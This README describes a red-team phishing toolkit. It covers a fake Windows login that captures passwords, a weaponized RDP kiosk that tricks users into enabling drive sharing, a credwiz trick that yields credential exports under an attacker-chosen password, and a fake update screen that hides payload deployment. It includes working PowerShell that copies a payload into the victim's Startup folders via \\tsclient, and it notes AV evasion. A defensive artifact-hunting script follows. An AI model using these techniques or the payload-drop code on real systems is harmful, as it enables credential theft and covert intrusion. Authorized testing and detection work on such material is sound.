# PhishTrap: Weaponized Windows Phishing Toolkit - Social Engineering with Pure PowerShell
⚔️ Red Team tools for capturing credentials and planting payloads using native Windows features.

## Overview
PhishTrap is a Red Team-oriented toolkit designed to simulate phishing scenarios using legitimate Windows components. Instead of relying on exploits or malware, it leverages trusted UI elements and built-in OS behaviors to trick users into revealing credentials or enabling access vectors, without touching anything that typical endpoint tooling flags as malicious.
## Features
- Fully written in PowerShell
- No need for external tools or exploits
- Stealthy and highly customizable
- Built for Red Team ops, Adversary Emulation, and Security Labs
## 📁 WINDOWS_LOGIN/
- Displays a realistic Windows login screen
- Captures the password typed by the user
- No LSASS dump or other suspicious behavior
- Suited to post-exploitation or internal phishing
## 📁 RDP/
- Weaponized `.rdp` file and a Windows Server setup
- Locks the user inside a kiosk-style session
- Tricks them into enabling drive sharing
- When enabled, drops the payload onto their local system via `\\tsclient`

📝 Includes:
- Key disabling (Alt+Tab, Ctrl+Alt+Del)
- Fake security prompt in fullscreen Edge
- Auto-drop into the Startup folder
- Registry-based persistence and cleanup logic
This tool simulates a real-world initial access scenario via a weaponized Windows Server and an .rdp file. It's made for Red Team operations, adversary emulation, or lab experiments.
Goal: Trick users into enabling drive sharing through RDP and silently plant a payload for post-exploitation.
| Step | Action |
|---|---|
| 1 | User opens the `.rdp` file or connects to the server |
| 2 | A kiosk session launches, disabling all key combos |
| 3 | User sees a fake security popup asking them to enable drive sharing |
| 4 | If sharing is enabled, the tool reaches the user's local drives via `\\tsclient` |
| 5 | Payload is copied to the client's Startup folder and runs at the next local logon |
| 6 | Session exits kiosk mode and restores the real desktop |
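The server-side half of steps 4 and 5, as an added PowerShell example that is not part of PhishTrap's own code. Run from inside the RDP session on the server, it checks whether client drive redirection is blocked by policy, enumerates which client drives the victim's mstsc has exposed under `\\tsclient\`, resolves the client-side Startup folders without trusting the RDP logon name, and copies a payload there. The payload path `C:\Lab\payload.cmd` is a placeholder assumption.

```powershell
# Added example for the RDP/ flow (not PhishTrap code). Run inside the RDP session on the server.

function Get-DriveRedirectionPolicy {
    # fDisableCdm = 1 means "Do not allow drive redirection". The policy key (GPO) overrides
    # the per-listener setting; if either is 1, \\tsclient\<letter> never appears in the session.
    $paths = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services',
        'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
    )
    foreach ($p in $paths) {
        $v = (Get-ItemProperty -Path $p -Name 'fDisableCdm' -ErrorAction SilentlyContinue).fDisableCdm
        [pscustomobject]@{ Path = $p; fDisableCdm = $v; RedirectionBlocked = ($v -eq 1) }
    }
}

function Get-TsClientDrives {
    # mstsc exposes every redirected client drive to the session as \\tsclient\<letter>.
    # On the console (SESSIONNAME = 'Console') the name does not resolve at all.
    if ($env:SESSIONNAME -notlike 'RDP-*') { Write-Warning "Not an RDP session ($env:SESSIONNAME)"; return @() }
    65..90 | ForEach-Object { [char]$_ } |
        Where-Object { Test-Path -LiteralPath ("\\tsclient\{0}" -f $_) } |
        ForEach-Object { "\\tsclient\$_" }
}

function Get-TsClientStartupFolders {
    # The RDP logon name need not match the victim's local account, so enumerate
    # C:\Users on the client instead of building the path from $env:USERNAME.
    $drives = @(Get-TsClientDrives)
    if ($drives -notcontains '\\tsclient\C') { return @() }
    Get-ChildItem -LiteralPath '\\tsclient\C\Users' -Directory -ErrorAction SilentlyContinue |
        ForEach-Object { Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' } |
        Where-Object { Test-Path -LiteralPath $_ }
}

function Invoke-TsClientDrop {
    param([Parameter(Mandatory)][string]$Payload)   # placeholder, e.g. C:\Lab\payload.cmd (assumption)
    $targets = @(Get-TsClientStartupFolders)
    if (-not $targets) { Write-Warning 'No redirected C: drive with a reachable Startup folder'; return }
    foreach ($t in $targets) {
        Copy-Item -LiteralPath $Payload -Destination $t -Force
        [pscustomobject]@{ Dropped = (Join-Path $t (Split-Path $Payload -Leaf)) }
    }
}

Get-DriveRedirectionPolicy | Format-Table -AutoSize
Get-TsClientDrives
# Invoke-TsClientDrop -Payload 'C:\Lab\payload.cmd'   # uncomment in the lab
```

A defender breaks the whole chain by setting `fDisableCdm` to 1 in the policy key (the "Do not allow drive redirection" GPO): with it set, `\\tsclient\C` is never mounted no matter what the fake prompt persuades the user to click. Note also that the copied file only executes at the victim's next interactive logon on the client, which is why the page calls this post-exploitation rather than immediate execution.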
- Setup video: Watch the video
- Demo video: Watch the demo
- Setup: use `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon` to run the kiosk page as the first process on first logon; use `shell:startup` and `shell:commo` to deploy the payload and to re-show the fake security page every time the user connects; use the SharpKeys tool and a `.reg` file to disable the keys and to remove the mapping afterwards.
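The registry artifacts the setup relies on are also what an analyst hunts for. The following is an added PowerShell example, not part of PhishTrap, that reads the three of them on a host: the Winlogon `Shell` value (which replaces `explorer.exe` with the kiosk's first process), the `Scancode Map` value that SharpKeys writes to disable keys, decoded entry by entry, and the contents of both Startup folders. The scancode name table covers only the common modifier keys; anything else is reported by raw scancode. `$SampleMap` is a constructed byte string, included so the decoder can be exercised on a machine with no map set.

```powershell
# Added example (not PhishTrap code): enumerate the kiosk/persistence artifacts described above.

function Get-WinlogonShell {
    # Default is 'explorer.exe'. A per-user HKCU value overrides HKLM for that account only.
    foreach ($hive in 'HKLM', 'HKCU') {
        $key = "${hive}:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
        $shell = (Get-ItemProperty -Path $key -Name 'Shell' -ErrorAction SilentlyContinue).Shell
        [pscustomobject]@{ Hive = $hive; Shell = $shell; Suspicious = [bool]($shell -and $shell -ne 'explorer.exe') }
    }
}

# Scancode Map layout: 8 zero bytes (version, flags), a DWORD entry count that includes the
# terminating null entry, then one DWORD per mapping: high word = original key, low word = new key.
# A new key of 0x0000 disables the original key; that is how SharpKeys "removes" Alt, Ctrl, Win, Tab.
$ScancodeNames = @{
    0x0001 = 'Esc'; 0x000F = 'Tab'; 0x001D = 'Left Ctrl'; 0xE01D = 'Right Ctrl'
    0x0038 = 'Left Alt'; 0xE038 = 'Right Alt'; 0xE05B = 'Left Win'; 0xE05C = 'Right Win'
    0xE053 = 'Delete'; 0xE05D = 'Menu'
}

function Get-ScancodeName([int]$Code) {
    if ($ScancodeNames.ContainsKey($Code)) { $ScancodeNames[$Code] } else { 'unknown' }
}

function ConvertFrom-ScancodeMap {
    param([byte[]]$Bytes)
    if (-not $Bytes -or $Bytes.Length -lt 16) { return @() }
    $count = [BitConverter]::ToUInt32($Bytes, 8)
    for ($i = 0; $i -lt ($count - 1); $i++) {
        $entry = [BitConverter]::ToUInt32($Bytes, 12 + 4 * $i)
        $from  = [int]($entry -shr 16)
        $to    = [int]($entry -band 0xFFFF)
        [pscustomobject]@{
            From     = '0x{0:X4} ({1})' -f $from, (Get-ScancodeName $from)
            To       = '0x{0:X4} ({1})' -f $to,   (Get-ScancodeName $to)
            Disabled = ($to -eq 0)
        }
    }
}

function Get-ScancodeMapEntries {
    $raw = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Keyboard Layout' `
                -Name 'Scancode Map' -ErrorAction SilentlyContinue).'Scancode Map'
    ConvertFrom-ScancodeMap -Bytes $raw
}

function Get-StartupItems {
    # Per-user shell:startup and all-users shell:common startup.
    foreach ($f in 'Startup', 'CommonStartup') {
        $path = [Environment]::GetFolderPath($f)
        Get-ChildItem -LiteralPath $path -Force -ErrorAction SilentlyContinue |
            Select-Object @{ n = 'Folder'; e = { $f } }, Name, LastWriteTime
    }
}

# Constructed sample: a map that disables Left Alt (0x0038) and Left Win (0xE05B).
$SampleMap = [byte[]](0,0,0,0, 0,0,0,0, 3,0,0,0, 0,0,0x38,0x00, 0,0,0x5B,0xE0, 0,0,0,0)

Get-WinlogonShell | Format-Table -AutoSize
ConvertFrom-ScancodeMap -Bytes $SampleMap | Format-Table -AutoSize
Get-ScancodeMapEntries | Format-Table -AutoSize
Get-StartupItems | Format-Table -AutoSize
```

Scancode Map is read at logon, so the disabled keys only take effect after the next sign-in, and cleanup means deleting the value and signing in again; that is why the setup pairs SharpKeys with a `.reg` file for removal. A non-default Winlogon `Shell` on an RDS host or workstation is a strong signal on its own.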
## 📁 CREDWIZ_LOCKSCREEN/
- Displays a fake fullscreen security window instructing the user to press Ctrl + Alt + Delete
- The user is told to enter a "Secure Access Code" (e.g. `1234`)
- Meanwhile, the script silently launches `credwiz.exe` and uses the same code (`1234`) as the protection password for a `.crd` credential backup
- Because the password was attacker-chosen, the resulting credential export can be decrypted later

🔧 This technique tricks the user into generating a credential export encrypted with a known password, without ever asking for their real system password. It works because the genuine Credential Manager backup wizard itself requires a Ctrl+Alt+Delete secure-desktop step to set the backup password, so the fake prompt's instruction lines up with a real Windows dialog. What the `.crd` file contains is the user's Credential Manager vault (saved Windows credentials), not the logon password.
## 📁 WINDOWS_UPDATE/
- Displays a realistic, full-screen "Windows Update in Progress" UI
- Blocks user interaction and disables key combos (Alt+Tab, Ctrl+Alt+Del)
- Used as a diversion layer during post-exploitation or payload deployment
## 🔧 Usage Scenario
The fake update screen is used to:
- Keep the user distracted while payloads are deployed in the background
- Prevent user input or investigation during sensitive operations
- Give the illusion of a system update, increasing trust and delay

General use cases for the toolkit:
- Combine with C2 frameworks for post-execution control
- Deploy in lab simulations to train Blue Teams
- Stay under typical AV signatures by relying on native Windows behaviour rather than malware tooling (behavioural detection of the registry and Startup changes still applies)
- Use in Red Team assessments with a stealth-first mindset
## Disclaimer
🚨 This tool is developed strictly for educational and authorized security testing purposes only.
🔬 It is intended to help cybersecurity professionals, researchers, and enthusiasts understand post-exploitation, red teaming, and detection techniques in lab or controlled environments.
❌ Do NOT use this tool on any system or network without explicit permission. Unauthorized use may be illegal and unethical.
The author takes no responsibility for any misuse or damage caused by this project.
Always hack responsibly. 💻🔐